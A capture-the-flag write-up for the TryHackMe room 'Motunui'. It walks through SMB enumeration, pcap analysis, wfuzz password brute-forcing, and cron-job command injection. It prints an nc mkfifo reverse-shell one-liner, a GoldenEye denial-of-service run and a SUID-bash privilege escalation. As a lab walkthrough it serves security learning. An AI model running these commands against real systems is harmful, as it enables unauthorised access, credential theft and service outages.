Motunui TryHackMe Writeup

14 minute read

motunui

Motunui is a hard rated TryHackme room by JakeDoesSec. This writeup contains analyzing network capture file using wireshark, bruteforcing login using wfuzz, using cisco packet tracer to read running configuration of switch to obtain a login credential for a user on the box and denial of service attack to get root shell on the box.

Port Scan

All Ports Scan

[email protected]:~/Documents/tryhackme/motunui$ nmap -p- --min-rate 10000 -oN nmap/all-ports -v 10.10.184.126
Nmap scan report for 10.10.184.126
Host is up (0.41s latency).
Not shown: 65531 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Nov 19 19:50:22 2020 -- 1 IP address (1 host up) scanned in 87.55 seconds

4 ports are open and the service running are SSH, HTTP and SMB.

Detail Scan

[email protected]:~/Documents/tryhackme/motunui$ cat nmap/detail 
# Nmap 7.80 scan initiated Thu Nov 19 19:52:45 2020 as: nmap -p22,80,139,445 -sC -sV -oN nmap/detail -v 10.10.184.126
Nmap scan report for 10.10.184.126
Host is up (0.40s latency).
                                            
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                
|   2048 20:f4:43:ac:39:fe:94:13:7a:ad:3d:e6:5f:b4:7e:71 (RSA)
|   256 49:8c:75:e1:78:e9:72:65:de:c9:14:74:0f:d4:1a:81 (ECDSA)
|_  256 0b:b6:27:f9:ad:ed:22:a9:90:ac:9e:b3:85:1b:aa:96 (ED25519)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
| http-methods:                                                                         
|_  Supported Methods: OPTIONS HEAD GET POST 
|_http-server-header: Apache/2.4.29 (Ubuntu) 
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Host script results:                                                                    
| nbstat: NetBIOS name: MOTUNUI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   MOTUNUI<00>          Flags: <unique><active>
|   MOTUNUI<03>          Flags: <unique><active>
|   MOTUNUI<20>          Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: motunui
|   NetBIOS computer name: MOTUNUI\x00
|   Domain name: \x00
|   FQDN: motunui
|_  System time: 2020-11-19T14:08:00+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-19T14:08:00
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 19 19:53:40 2020 -- 1 IP address (1 host up) scanned in 55.26 seconds

Lets start our enumeration with SMB.

Port 445

Trying NULL authentication with SMBClient

[email protected]:~/Documents/tryhackme/motunui$ smbclient -N -L 10.10.184.126

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        traces          Disk      Network shared files
        IPC$            IPC       IPC Service (motunui server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

We can list shares with null authentication. IPC$ and Print$ are the default shares.

Checking permission on the shares

[email protected]:~/Documents/tryhackme/motunui/notes$ crackmapexec smb 10.10.193.225 -u '' -p '' --shares
SMB         10.10.193.225   445    MOTUNUI          [*] Windows 6.1 (name:MOTUNUI) (domain:) (signing:False) (SMBv1:True)
SMB         10.10.193.225   445    MOTUNUI          [+] \: 
SMB         10.10.193.225   445    MOTUNUI          [+] Enumerated shares
SMB         10.10.193.225   445    MOTUNUI          Share           Permissions     Remark
SMB         10.10.193.225   445    MOTUNUI          -----           -----------     ------
SMB         10.10.193.225   445    MOTUNUI          print$                          Printer Drivers
SMB         10.10.193.225   445    MOTUNUI          traces          READ            Network shared files
SMB         10.10.193.225   445    MOTUNUI          IPC$                            IPC Service (motunui server (Samba, Ubuntu))

Looks like we can read the content of the share traces. So, lets mount the share locally so that it will be easier to work with.

Mounting Share locally

[email protected]:~/Documents/tryhackme/motunui$ mkdir mnt
[email protected]:~/Documents/tryhackme/motunui$ sudo mount -t cifs //10.10.193.225/traces mnt
Password for [email protected]//10.10.193.225/traces:   
[email protected]:~/Documents/tryhackme/motunui$ ls -la mnt
total 4
drwxr-xr-x  2 root     root        0 Jul  9 09:33 .
drwxrwxr-x 10 local local 4096 Dec  4 14:07 ..
drwxr-xr-x  2 root     root        0 Aug  3 22:07 maui
drwxr-xr-x  2 root     root        0 Jul  9 09:35 moana
drwxr-xr-x  2 root     root        0 Jul  9 09:35 tui

And the share is mounted and we can see the contents inside the share. Then I copied all the files to my local drive and unmounted the share. The files can also be downloaded using smbclient.

Unmounting the share

[email protected]:~/Documents/tryhackme/motunui$ sudo umount mnt 

Contents inside traces

[email protected]:~/Documents/tryhackme/motunui/smb$ tree
.
├── maui
│   └── ticket_6746.pcapng
├── moana
│   ├── ticket_31762.pcapng
│   └── ticket_64947.pcapng
└── tui
    ├── ticket_1325.pcapng
    └── ticket_7876.pcapng

3 directories, 6 files

There are few network capture files.

[email protected]ocal:~/Documents/tryhackme/motunui/smb$ ls -lR
.:
total 12
drwxr-xr-x 2 local local 4096 Nov 19 20:08 maui
drwxr-xr-x 2 local local 4096 Nov 19 19:58 moana
drwxr-xr-x 2 local local 4096 Nov 19 19:59 tui

./maui:
total 112
-rwxr-xr-x 1 local local 79296 Nov 19 19:59 ticket_6746.pcapng

./moana:
total 0
-rwxr-xr-x 1 local local 0 Nov 19 19:58 ticket_31762.pcapng
-rwxr-xr-x 1 local local 0 Nov 19 19:58 ticket_64947.pcapng

./tui:
total 0
-rwxr-xr-x 1 local local 0 Nov 19 19:59 ticket_1325.pcapng
-rwxr-xr-x 1 local local 0 Nov 19 19:59 ticket_7876.pcapng

Also there is only content inside folder maui and all other network capture files are empty. So, lets analyse the network capture on wireshark.

Analysing pcapng file using wireshark

1

As I was checking the TCP stream, I found a request made for /dashboard.png file and also the response. 2 So I saved the image using Export Object functionality of wireshark. 3

Dashboard.png

dashboard The image leaks the virtual host which is a development server. So, lets add this entry to our /etc/hosts file.

10.10.193.225   d3v3lopm3nt.motunui.thm motunui.thm thm

Visiting development server

4 This is the same page as earlier.

Directory Bruteforcing

[email protected]:~/Documents/tryhackme/motunui$ gobuster dir -u http://d3v3lopm3nt.motunui.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50 -o gobuster/development.log
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://d3v3lopm3nt.motunui.thm/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,md
[+] Timeout:        10s
===============================================================
2020/11/19 20:30:31 Starting gobuster
===============================================================
/index.php (Status: 200)
/docs (Status: 301)
/javascript (Status: 301)

/docs

While visiting on /docs, it attempts to download file called README.md

Contents of README.md

[email protected]:~/Documents/tryhackme/motunui/smb/maui$ curl http://d3v3lopm3nt.motunui.thm/docs/README.md
# Documentation for the in-development API

##### [Changelog](CHANGELOG.md) | [Issues](ISSUES.md)

Please do not distribute this documentation outside of the development team.

## Routes
Find all of the routes [here](ROUTES.md).

We get information about the in-development API service. It says there are few other files on the /docs, so I downloaded all of them and there is not much on the files except ROUTES.md.

Contents of ROUTES.md

[email protected]:~/Documents/tryhackme/motunui/smb/maui$ curl http://d3v3lopm3nt.motunui.thm/docs/ROUTES.md
# Routes

The base URL for the api is `api.motunui.thm:3000/v2/`.

### `POST /login`
Returns the hash for the specified user to be used for authorisation.
#### Parameters
- `username`
- `password`
#### Response (200)
\```js
{
	"hash": String()
}
\```
#### Response (401)
```js
{
	"error": "invalid credentials"
}
\```

### 🔐 `GET /jobs`
Returns all the cron jobs running as the current user.
#### Parameters
- `hash`
#### Response (200)
```js
{
	"jobs": Array()
}
\```
#### Response (403)
```js
{
	"error": "you are unauthorised to view this resource"
}
\```

### 🔐 `POST /jobs`
Creates a new cron job running as the current user.
#### Parameters
- `hash`
#### Response (201)
```js
{
	"job": String()
}
\```
#### Response (401)
\```js
{
	"error": "you are unauthorised to view this resource"
}
\```

Here we get another hostname and a base url for the api service, api.motunui.thm:3000/v2/ and different routes that we can use. So, I have added this file to /etc/hosts and started playing with different endpoints.

Trying to login with some default credentials

[email protected]:~/Documents/tryhackme/motunui$ curl -H 'Content-Type: application/json' -d '{"username":"admin","password":"admin"}' -XPOST http://api.motunui.thm:3000/v2/login
{"error":"invalid credentials"

The problem here is that we have to be authenticated to perform any type of operation. I tried few default credentials like admin:admin, admin:password but that didnot work.

As the api version was v2, I checked whether the old api version was still available.

[email protected]:~/Documents/tryhackme/motunui$ curl http://api.motunui.thm:3000/v1/login
{"message":"please get maui to update these routes"}

And we get message back leaking a potential username. I fuzzed all the webservers for some time and decided to bruteforce login credential for user maui.

Bruteforcing using wfuzz

[email protected]:~/Documents/tryhackme/motunui$ wfuzz -w /usr/share/wordlists/SecLists-master/Passwords/Leaked-Databases/rockyou-45.txt -c -H 'Content-Type: application/json' 
-d '{"username":"maui","password":"FUZZ"}' --hh 31 -t 50 http://api.motunui.thm:3000/v2/login
********************************************************
* Wfuzz 3.0.3 - The Web Fuzzer                         *
********************************************************

Target: http://api.motunui.thm:3000/v2/login
Total requests: 6163

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                        
===================================================================

000004343:   200        0 L      1 W      19 Ch       "<redacted_password>" 

And we get the password for user maui. So, lets login as user maui and view the jobs.

Logging as user maui

[email protected]:~/Documents/tryhackme/motunui$ curl -H 'Content-Type: application/json' -d '{"username":"maui","password":"<redacted_password>"}' -XPOST http://api.motunui.thm:3000/v2/login
{"hash":"<redacted_hash>"}

We get a hash which is needed to view the jobs.

Listing the jobs

[email protected]:~/Documents/tryhackme/motunui$ curl -H 'Content-Type: application/json' -d '{"hash":"<redacted_hash>"}'  http://api.motunui.thm:3000/v2/jobs
{}

Looks like there are no any cronjobs running for user maui. Since we can create a new job, lets try if we can get code execution.

Creating a new job

[email protected]:~/Documents/tryhackme/motunui$ curl -H 'Content-Type: application/json' -d '{"hash":"<redacted_hash>","job":"* * * * * ping -c 1 10.6.31.213"}' -XPOST http://api.motunui.thm:3000/v2/jobs 
{"job":"* * * * * ping -c 1 10.6.31.213"}

I have created a job so that it pings my local device and I set up tcpdump for listening the ICMP packets and soon after a while we get a response back which means we have code execution.

[email protected]:~/Documents/tryhackme/motunui$ sudo tcpdump -i tun0 icmp
[sudo] password for local: 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
14:47:01.786740 IP d3v3lopm3nt.motunui.thm > local: ICMP echo request, id 1877, seq 1, length 64
14:47:01.786773 IP local > d3v3lopm3nt.motunui.thm: ICMP echo reply, id 1877, seq 1, length 64

The next step would be try and get a reverse shell.

Reverse Shell as www-data

Lets create another job and this time use reverse shell payload.

Creating a new jobs

[email protected]:~/Documents/tryhackme/motunui$ curl -H 'Content-Type: application/json' -d '{"hash":"<redacted_hash>","job":"* * * * * rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.31.213 9001 >/tmp/f"}' -XPOST http://api.motunui.thm:3000/v2/jobs
{"job":"* * * * * rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.31.213 9001 >/tmp/f"}

The jobs is created succesfully and after some time,we get connection back on our netcat listener.

[email protected]:~/Documents/tryhackme/motunui$ nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.193.225 35464
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),105(crontab)

The user www-data is in crontab group and I searched if this can be used for privilege escalation and found a article, but I couldnot replicate the result. So, I continued with my enumeration.

Privilege Escalation

Users on the box

[email protected]:/home$ ls -la
total 16
drwxr-xr-x  4 root    root    4096 Jul  7 16:32 .
drwxr-xr-x 24 root    root    4096 Aug  3 13:07 ..
drwxr-xr-x  7 moana   moana   4096 Sep 30 23:57 moana
drwxr-xr-x  3 network network 4096 Jul  9 03:48 network

Content inside network’s home directory

[email protected]:/home$ ls -la network/
total 28
drwxr-xr-x 3 network network 4096 Jul  9 03:48 .
drwxr-xr-x 4 root    root    4096 Jul  7 16:32 ..
-rw------- 1 network network  246 Jul  7 17:51 .bash_history
-rw-r--r-- 1 network network  220 Jul  7 16:32 .bash_logout
-rw-r--r-- 1 network network 3771 Jul  7 16:32 .bashrc
-rw-r--r-- 1 network network  807 Jul  7 16:32 .profile
drwxrwxr-x 5 network network 4096 Jul  9 03:48 traces

SMB share traces is on the home directory of user network. Other than that there is not much interesting information here.

Contents on moana home directory

[email protected]:/home/moana$ ls
read_me  user.txt
[email protected]:/home/moana$

We do not have permission to read user.txt, but we can read the file read_me.

Contents of read_me

[email protected]:/home/moana$ cat read_me 
I know you've been on vacation and the last thing you want is me nagging you.

But will you please consider not using the same password for all services? It puts us all at risk.

I have started planning the new network design in packet tracer, and since you're 'the best engineer this <redacted_password> has seen', go find it and finish it.

This file talks about credentials reusing by user moana and a new network design on packet tracer. Since cisco packet tracer files have extension pkt, lets search for the files that have extension .pkt.

Using find to search files

[email protected]:/home/moana$ find / -type f -iname '*pkt' -ls 2>/dev/null
   926350     76 -rwxrwxrwx   1 moana    moana       75918 Jul  9 03:19 /etc/network.pkt

And we get a file which is world readable. I downloaded this file to analyse on cisco packet tracer. I have cisco packet tracer already installed on my box as I had recently finished studying Computer Networks, but you can download the packet tracer from here. You may have to sign up to get the download link.

Analyzing file on packet tracer

Network Topology

5 As I was looking around the configurations and information for router and switches, I found a password for user moana on switch config. 6 Lets try to login to moana account using SSH.

[email protected]:~/Documents/tryhackme/motunui$ ssh [email protected]
Warning: Permanently added the ECDSA host key for IP address '10.10.193.225' to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Dec  4 09:30:26 UTC 2020

  System load:  0.0                Processes:           133
  Usage of /:   37.0% of 18.57GB   Users logged in:     0
  Memory usage: 50%                IP address for eth0: 10.10.193.225
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

20 packages can be updated.
0 updates are security updates.


Last login: Wed Sep 30 23:51:55 2020 from 10.11.3.2
[email protected]:~$ id
uid=1000(moana) gid=1000(moana) groups=1000(moana)

And we login as user moana.

Reading user flag

[email protected]:~$ cat user.txt 
THM{m*****4_0f_M*****1}

I ran linpeas again and found out that user moana can edit a .service file.

[email protected]:~$ find / -type f -name '*service' -group moana -ls 2>/dev/null
   665881      4 -rw-rw-r--   1 root     moana         204 Aug 20 23:13 /etc/systemd/system/api.service

Contents of api.service

[email protected]:~$ cat /etc/systemd/system/api.service
[Unit]
Description=The API for Motunui

[Service]
User=www-data
Group=www-data
ExecStart=/usr/bin/node /var/www/api.motunui.thm/server.js
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target

We can edit this file and when the program restarts /usr/bin/node /var/www/api.motunui.thm/server.js command is executed. But even though we can change the content of the file, we do not have permission to reload the systemd daemon, which means we can not get code execution as root until we can find a way to reload the daemon.

I was not very familiar with how exactly this all works, so I began to play with the service and files.

File Permission for /var/www/

[email protected]:/home/moana$ ls -la /var/www
total 24
drwxr-xr-x  6 www-data www-data 4096 Aug  3 14:49 .
drwxr-xr-x 14 root     root     4096 Aug  3 16:54 ..
drwxr-xr-x  3 www-data www-data 4096 Aug 21 00:25 api.motunui.thm
drwxr-xr-x  3 www-data www-data 4096 Jul  9 00:57 d3v3lopm3nt.motunui.thm
drwxr-xr-x  2 www-data www-data 4096 Aug  3 14:47 html
drwxr-xr-x  3 www-data www-data 4096 Aug  3 15:09 tls-html

Since www-data owns all the files, we can easily edit the files. So, lets try editing server.js and check if it is actually reflected on the webserver.

Changing content of /var/www/api.motunui.thm/server.js

Old Content

7

New Content

8

I waited for some time and checked the reponse but the response was still the same.

[email protected]:~/Documents/tryhackme/motunui$ curl -H 'Content-Type: application/json' http://api.motunui.thm:3000/v1/jobs
{"message":"please get maui to update these routes"}

Then I thought, this process is running as www-data, what if I kill the running process. Then I killed the running process.

[email protected]:~/api.motunui.thm$ ps -aux | grep -i api
www-data   855  0.2  7.3 930732 36240 ?        Ssl  08:06   0:13 /usr/bin/node /var/www/api.motunui.thm/server.js
www-data  3110  0.0  0.2  13136  1008 pts/0    S+   09:52   0:00 grep -i api
[email protected]:~/api.motunui.thm$ kill 855

And after some time the process is up again.

[email protected]:~/api.motunui.thm$ ps -aux | grep -i api
www-data  3122  4.4  6.7 924604 32960 ?        Ssl  09:52   0:00 /usr/bin/node /var/www/api.motunui.thm/server.js
www-data  3148  0.0  0.2  13136  1144 pts/0    S+   09:52   0:00 grep -i api

And if we make a request to the earlier address, we get the updated content.

[email protected]:~/Documents/tryhackme/motunui$ curl -H 'Content-Type: application/json' http://api.motunui.thm:3000/v1/jobs
{"message":"THIS WORKS!!!"}

Even though this works, it is not much of use for us as the command being executed are as user www-data.

While enumerating, I found something similar service file for another webserver.

Contents of https.service

[email protected]:~$ ls -la /etc/systemd/system/https.service 
-rw-r--r-- 1 root root 199 Aug  3 15:11 /etc/systemd/system/https.service
[email protected]:~$ cat /etc/systemd/system/https.service
[Unit]
Description=The HTTPS website for Motunui

[Service]
User=root
Group=root
ExecStart=/usr/bin/node /var/www/tls-html/server.js
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target

We can not edit this file but the webserver is already running as root and the file which is being executed while the service restarts is /var/www/tls-html/server.js, which can be edited by user www-data. But the problem here is the process is running as root and we can not kill this process like we did with the previous one.

So, I thought of sending a lot of traffic to the webserver, which might cause the process to crash and die. And if that happens, we can get code execution as user root.

I used goldeneye from github to create a lot of traffic. But before that, let’s edit the /var/www/tls-html/server.js file.

Editing /var/www/tls-html/server.js

9 This will just set the SUID bit on the /bin/bash binary.

Denial of Service attack using goldeneye

I uploaded the Goldeneye repo to the box and used it from there to generate huge amount of traffic.

[email protected]:/dev/shm/GoldenEye$ ./goldeneye.py https://localhost:5000 -w 200 -s 1000

GoldenEye v2.1 by Jan Seidl <[email protected]>

Hitting webserver in mode 'get' with 200 workers running 1000 connections each. Hit CTRL+C to cancel.

And when I tried to browser the webserver, it was down. 10

Checking the permission of /bin/bash

[email protected]:/dev/shm/GoldenEye$ ls -la /bin/bash
-rwsrwxrwx 1 root root 1113504 Jun  6  2019 /bin/bash

The SUID bit is set on the binary. COOL!!

Getting a root shell

[email protected]:/dev/shm/GoldenEye$ /bin/bash -p
bash-4.4# id
uid=1000(moana) gid=1000(moana) euid=0(root) groups=1000(moana)

Reading root flag

bash-4.4# cat /root/root.txt
THM{h***T_r****d}